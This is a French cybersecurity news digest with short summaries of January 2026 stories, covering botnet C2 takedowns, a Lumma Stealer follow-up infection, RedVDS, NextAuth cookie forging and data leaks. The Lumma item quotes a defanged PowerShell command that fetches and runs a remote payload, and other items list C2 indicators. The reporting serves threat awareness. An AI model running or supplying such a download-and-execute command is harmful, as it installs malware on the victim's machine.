Lumen/Black Lotus Labs perturbe les botnets DDoS Aisuru et Kimwolf en neutralisant 550+ serveurs C2

Selon Black Lotus Labs (Lumen Technologies), l’opĂ©rateur a observĂ© fin 2025 une croissance fulgurante du botnet Aisuru (jusqu’à >11 Tbps), puis l’apparition d’un nouveau botnet Kimwolf, alimentĂ© par l’exploitation de services de proxy rĂ©sidentiel. Lumen dĂ©crit ses actions de disruption (null-routing) ayant permis de neutraliser plus de 550 serveurs C2. — Contexte et montĂ©e en puissance — En septembre 2025, Aisuru passe d’environ 50 000 Ă  200 000 bots/jour, corrĂ©lĂ© Ă  des attaques records (>11 Tbps). Un backend C2 d’Aisuru (65.108.5[.]46) agit comme entonnoir de trafic depuis les C2 confirmĂ©s. Des connexions SSH depuis des IP canadiennes vers 194.46.59[.]169 (proxy-sdk.14emeliaterracewestroxburyma02132[.]su) suggĂšrent une interface de contrĂŽle. Le backend adopte ensuite le domaine client.14emeliaterracewestroxburyma02132[.]su. — Bifurcation vers Kimwolf — ...

16 janvier 2026 Â· 3 min

Lumma Stealer multiplie les tùches planifiées et accroßt le trafic C2 vers fileless-market[.]cc

Source: billet signĂ© par Brad Duncan (publiĂ© le 14 janvier 2026). Contexte: l’auteur documente en laboratoire un exemple d’infection Lumma Stealer prĂ©sentant un comportement post-infection inhabituel qui gĂ©nĂšre une hausse continue de trafic vers un mĂȘme domaine C2. AprĂšs l’exfiltration des donnĂ©es par Lumma Stealer, l’hĂŽte Windows infectĂ© rĂ©cupĂšre des instructions depuis un lien Pastebin (hxxps[:]//pastebin[.]com/raw/xRmmdinT) utilisĂ©es pour une infection de suivi. Le contenu Pastebin renvoie une commande PowerShell: irm hxxps[:]//fileless-market[.]cc/Notes.pdf | iex, entraĂźnant des requĂȘtes HTTPS rĂ©pĂ©tĂ©es vers hxxps[:]//fileless-market[.]cc/. ...

16 janvier 2026 Â· 2 min

Mandiant publie des tables arc-en-ciel Net‑NTLMv1 pour accĂ©lĂ©rer l’abandon du protocole

Source: Mandiant (Threat Intelligence, 15 janvier 2026). Contexte: l’éditeur publie un vaste jeu de tables arc‑en‑ciel pour Net‑NTLMv1, visant Ă  illustrer le risque immĂ©diat de ce protocole obsolĂšte et Ă  favoriser sa dĂ©prĂ©ciation effective. Mandiant annonce la mise Ă  disposition publique d’un dataset complet de tables arc‑en‑ciel Net‑NTLMv1, soulignant que ce protocole est insecure depuis plus de deux dĂ©cennies. L’objectif est de faciliter pour les dĂ©fenseurs la dĂ©monstration concrĂšte de la faiblesse de Net‑NTLMv1 (sans ESS) via une attaque par texte clair connu sur le texte « 1122334455667788 », garantissant la rĂ©cupĂ©ration du matĂ©riel de clĂ© (liĂ© au hash de mot de passe AD) et potentiellement une escalade de privilĂšges. ...

16 janvier 2026 Â· 2 min

Microsoft dĂ©mantĂšle RedVDS, un service de bureaux virtuels au cƓur de campagnes cybercriminelles

Source : BleepingComputer — Microsoft a annoncĂ© avoir perturbĂ© RedVDS, une plateforme cybercriminelle de « virtual desktop » (VDS) opĂ©rant depuis 2019, via des actions civiles aux États‑Unis et au Royaume‑Uni et une opĂ©ration internationale conduite avec Europol et les autoritĂ©s allemandes. RedVDS fonctionnait comme un Cybercrime-as-a-Service vendant des serveurs Windows en cloud avec droits administrateur et sans limites d’usage pour environ 24 $/mois. La plateforme a Ă©tĂ© utilisĂ©e par plusieurs groupes de menace, dont Storm‑0259, Storm‑2227, Storm‑1575 et Storm‑1747, et son dĂ©veloppeur/opĂ©rateur est suivi comme Storm‑2470. Microsoft a saisi l’infrastructure, mettant hors ligne le marketplace et le portail client. Deux co‑demandeurs se sont joints Ă  l’action : H2‑Pharma (perte de 7,3 M$ via BEC) et l’association Gatehouse Dock Condominium en Floride (prĂšs de 500 000 $). ...

16 janvier 2026 Â· 3 min

Microsoft et les forces de l’ordre dĂ©mantĂšlent RedVDS, service de cybercriminalitĂ© Ă  l’abonnement

Source: Microsoft (Digital Crimes Unit) — Microsoft annonce une action juridique coordonnĂ©e aux États-Unis et, pour la premiĂšre fois, au Royaume‑Uni, appuyĂ©e par des autoritĂ©s allemandes et Europol, pour perturber RedVDS, un service d’abonnement fournissant des ordinateurs virtuels jetables utilisĂ©s dans des fraudes massives. L’opĂ©ration a permis la saisie d’infrastructures clĂ©s et la mise hors ligne de la place de marchĂ© RedVDS. RedVDS s’inscrit dans l’écosystĂšme cybercrime-as-a-service en offrant, dĂšs 24 USD par mois, des machines virtuelles discrĂštes et Ă©phĂ©mĂšres fonctionnant avec des logiciels non licenciĂ©s, dont Windows. Ce service a Ă©tĂ© massivement exploitĂ© pour envoyer des campagnes de phishing Ă  haut volume, hĂ©berger de l’infrastructure de scam, et faciliter des fraudes assistĂ©es par IA gĂ©nĂ©rative (face swap, manipulation vidĂ©o, clonage de voix). En un mois, plus de 2 600 VM RedVDS ont expĂ©diĂ© en moyenne 1 million d’e‑mails de phishing par jour vers des clients Microsoft (sur les 600 millions d’attaques bloquĂ©es quotidiennement), contribuant depuis septembre 2025 Ă  plus de 191 000 compromissions ou accĂšs frauduleux d’organisations. ...

16 janvier 2026 Â· 3 min

Moxie Marlinspike lance Confer, un assistant IA chiffré de bout en bout via TEE

Selon l’extrait d’actualitĂ© du 16 janvier 2026, Moxie Marlinspike (crĂ©ateur de Signal) lance Confer, un assistant IA privĂ© et open source misant sur le chiffrement de bout en bout et un environnement d’exĂ©cution de confiance (TEE) pour protĂ©ger les conversations. Le contexte Ă©voque les risques de stockage centralisĂ© des chatbots grand public et rappelle une ordonnance de juin 2025 imposant Ă  OpenAI de conserver indĂ©finiment les conversations de ChatGPT, alimentant la dĂ©fiance. Le billet de blog de Confer et des Ă©changes avec Ars Technica sont citĂ©s. ...

16 janvier 2026 Â· 2 min

Next.js/NextAuth : forger des cookies d’authentification via le NEXTAUTH_SECRET

Dans un billet technique publiĂ© le 14 janvier 2026, l’auteur dĂ©taille une mĂ©thode permettant Ă  un adversaire de forger des cookies d’authentification pour des applications Next.js utilisant NextAuth/Auth.js, en s’appuyant sur la vulnĂ©rabilitĂ© React2Shell (CVE-2025-55182). Le contexte dĂ©crit que l’exploitation de React2Shell peut laisser trĂšs peu de traces et permettre Ă  un attaquant d’exfiltrer des variables d’environnement, notamment des identifiants OAuth et surtout le secret d’application de NextAuth (NEXTAUTH_SECRET/AUTH_SECRET). L’article souligne que la rotation des seuls secrets OAuth est insuffisante : le secret NextAuth est la clĂ© pour chiffrer et authentifier les cookies de session. ...

16 janvier 2026 Â· 2 min

Pays-Bas: 7 ans de prison pour un hacker ayant infiltré les ports de Rotterdam et Anvers

Selon BleepingComputer, la Cour d’appel d’Amsterdam a confirmĂ© la condamnation d’un homme de 44 ans Ă  7 ans de prison pour piratage informatique, facilitation d’importation de drogue (210 kg de cocaĂŻne), et tentative d’extorsion, tout en le relaxant d’un chef liĂ© Ă  une tentative d’importation de 5 000 kg. Son appel, fondĂ© sur la contestation de l’interception de communications chiffrĂ©es via Sky ECC, a Ă©tĂ© rejetĂ©. đŸ§‘â€đŸ’» Modus operandi: l’individu a compromis les serveurs des ports de Rotterdam, Barendrecht et Anvers (Pays-Bas/Belgique) en s’appuyant sur des employĂ©s qui insĂ©raient des clĂ©s USB infectĂ©es. Cela lui a permis d’implanter un outil d’accĂšs Ă  distance (RAT) dans les systĂšmes internes, d’exfiltrer des donnĂ©es de bases de donnĂ©es et d’intercepter des donnĂ©es en transit. ...

16 janvier 2026 Â· 2 min

Quishing via QR codes stylisés : Deakin University propose ALFA pour bloquer les scans malveillants

Selon Help Net Security (15 janvier 2026), des chercheurs de Deakin University ont Ă©tudiĂ© l’usage de QR codes stylisĂ©s (couleurs, formes, logos, images de fond) dans les attaques de quishing et prĂ©sentent une mĂ©thode de dĂ©tection centrĂ©e sur la structure du code plutĂŽt que sur l’URL embarquĂ©e. Les QR codes masquent leur destination jusqu’au scan, ce qui contourne les passerelles e-mail qui inspectent les URL en clair. Les versions « fancy » brouillent en plus les repĂšres visuels (modules arrondis/Ă©tirĂ©s, recolorĂ©s, logos centraux, arriĂšre-plans), conservant une scannabilitĂ© Ă©levĂ©e tout en perturbant les outils de dĂ©tection existants. ...

16 janvier 2026 Â· 3 min

Relais Colis confirme une fuite de données via un prestataire; 10 M de lignes revendiquées sur un forum

Selon 01net (article de Florian Bayard, 16 janvier 2026), Relais Colis a confirmĂ© avoir subi une fuite de donnĂ©es Ă  la suite d’un incident de sĂ©curitĂ© chez l’un de ses prestataires techniques. — Contexte et confirmation — Relais Colis indique qu’un incident de sĂ©curitĂ© informatique chez un prestataire a conduit Ă  la compromission de donnĂ©es Ă  caractĂšre personnel. L’entreprise prĂ©cise avoir pris des mesures correctives et renforcĂ© ses dispositifs de sĂ©curitĂ©, et dĂ©clare avoir notifiĂ© la CNIL. ...

16 janvier 2026 Â· 2 min
Derniùre mise à jour le: 6 juillet 2026 📝